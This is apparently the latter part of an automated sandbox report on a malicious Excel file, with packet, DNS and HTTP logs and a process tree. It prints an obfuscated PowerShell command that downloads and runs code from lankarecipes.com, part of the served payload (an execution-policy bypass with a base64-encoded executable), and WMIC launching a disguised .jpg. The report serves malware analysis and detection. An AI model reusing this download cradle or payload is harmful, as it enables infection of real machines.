                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803751945 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803769112 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803776026 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803785086 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803806067 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803806067 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803823948 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803831100 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803839922 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803850889 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803855896 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803872108 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803884029 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803888083 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803905010 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803920984 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803934097 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803934097 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803950071 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803966045 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803980112 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803982019 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803997993 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804024935 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804025888 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804039001 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804055929 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804068089 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804085970 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804101944 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804102898 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.804116964 CET4972880192.168.2.4192.185.236.165

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jan 8, 2021 09:34:22.592523098 CET5453153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:22.648827076 CET53545318.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:23.071926117 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:23.131162882 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:24.094037056 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:24.153039932 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:25.098613977 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:25.157569885 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:26.267925024 CET5802853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:26.315888882 CET53580288.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:27.099524021 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:27.158677101 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:31.139883995 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:31.199232101 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:36.183619976 CET5309753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:36.231576920 CET53530978.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:42.078037977 CET4925753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:42.138613939 CET53492578.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:52.840903044 CET6238953192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.042937040 CET53623898.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:59.895586014 CET4991053192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:34:59.953301907 CET53499108.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.014930964 CET5585453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.071927071 CET53558548.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.438055038 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.486090899 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.652700901 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.711103916 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:02.415011883 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:02.463038921 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.068269968 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.116374016 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.436655045 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.501081944 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.799073935 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.847184896 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:04.461044073 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:04.519684076 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:05.148782015 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:05.199683905 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:06.196203947 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:06.255413055 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:07.485481977 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:07.533351898 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:08.052906990 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:08.103848934 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:17.736723900 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:17.794236898 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:26.740106106 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:26.788059950 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:27.832349062 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:27.883151054 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:28.678677082 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:28.737862110 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:29.505609989 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:29.553688049 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:30.348684072 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:30.396579981 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:31.162801981 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:31.210721970 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:32.180682898 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:32.228559971 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:33.177069902 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:33.228005886 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:35.227447033 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:35.278220892 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:36.259691954 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:36.308437109 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:37.616547108 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:37.667363882 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:38.440494061 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:38.488507986 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:40.361651897 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:40.409610033 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:41.209323883 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:41.257204056 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:42.041253090 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:42.091996908 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:43.765337944 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:43.824677944 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:46.709853888 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:46.757631063 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:55.405963898 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:55.453874111 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:58.299429893 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:58.366627932 CET53527528.8.8.8192.168.2.4

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Jan 8, 2021 09:34:52.840903044 CET192.168.2.48.8.8.80x9042Standard query (0)lankarecipes.comA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.042937040 CET8.8.8.8192.168.2.40x9042No error (0)lankarecipes.com192.185.236.165A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • lankarecipes.com

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.449728192.185.236.16580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.247750044 CET110OUTGET /mages.jpg HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                                                    Host: lankarecipes.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435033083 CET111INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 08 Jan 2021 08:34:53 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                                    Connection: Upgrade, Keep-Alive
                                                                                                                                                                                                    Last-Modified: Wed, 06 Jan 2021 16:11:54 GMT
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 453227
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=75
                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                    Data Raw: 20 53 45 54 2d 45 58 65 43 55 74 49 6f 6e 50 6f 6c 69 43 79 20 42 79 70 41 53 73 20 2d 73 43 6f 70 65 20 50 52 6f 43 45 53 73 20 2d 46 4f 72 43 45 20 3b 20 24 6b 61 45 43 43 66 6c 68 41 6e 56 56 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 37 4e 2f 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 38 41 4d 41 41 47 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 41 41 42 41 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 48 41 45 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 41 4d 45 41 46 41 41 41 41 41 41 4d 41 51 41 61 43 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 41 51 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 41 55 37 67 4d 41 41 42 41 41 41 41 44 77 41 77 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 41 41 42 41 41 41 45 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 45 41 51 41 41 42 41 41 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 42 6f 4c 41 41 41 41 44 41 45 41 41 41 77 41 41 41 41 49 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 2b 67 73 41 41 41 42 67 42 41 41 41 45 41 41 41 41 46 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: SET-EXeCUtIonPoliCy BypASs -sCope PRoCESs -FOrCE ; $kaECCflhAnVV = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA3YsTacwOqiXMDqolzA6qJ8B+kiXIDqolFJaeJcgOqiTwho4l2A6qJcwOqiXEDqolSaWNocwOqiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUA7N/1XwAAAAAAAAAA4AAOAQsBBgAA8AMAAGAAAAAAAAAcEgAAABAAAAAABAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAHAEAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATAMEAFAAAAAAMAQAaCwAAAAAAAAAAAAAAAAAAAAAAAAAYAQA/AgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAB0AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAU7gMAABAAAADwAwAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA/AkAAAAABAAAEAAAAAAEAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAEgVAAAAEAQAABAAAAAQBAAAAAAAAAAAAAAAAABAAADALnJzcmMAAABoLAAAADAEAAAwAAAAIAQAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAA+gsAAABgBAAAEAAAAFAEAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:20
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:25
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:26
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:26
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
                                                                                                                                                                                                    Imagebase:0x880000
                                                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:58
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
                                                                                                                                                                                                    Imagebase:0x12e0000
                                                                                                                                                                                                    File size:2170976 bytes
                                                                                                                                                                                                    MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:59
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                    File size:43176 bytes
                                                                                                                                                                                                    MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:04
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:05
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:06
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                                    File size:391680 bytes
                                                                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:07
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:339293 bytes
                                                                                                                                                                                                    MD5 hash:DD27F33FCD6F1FA4C67EE05D836795C2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Florian Roth
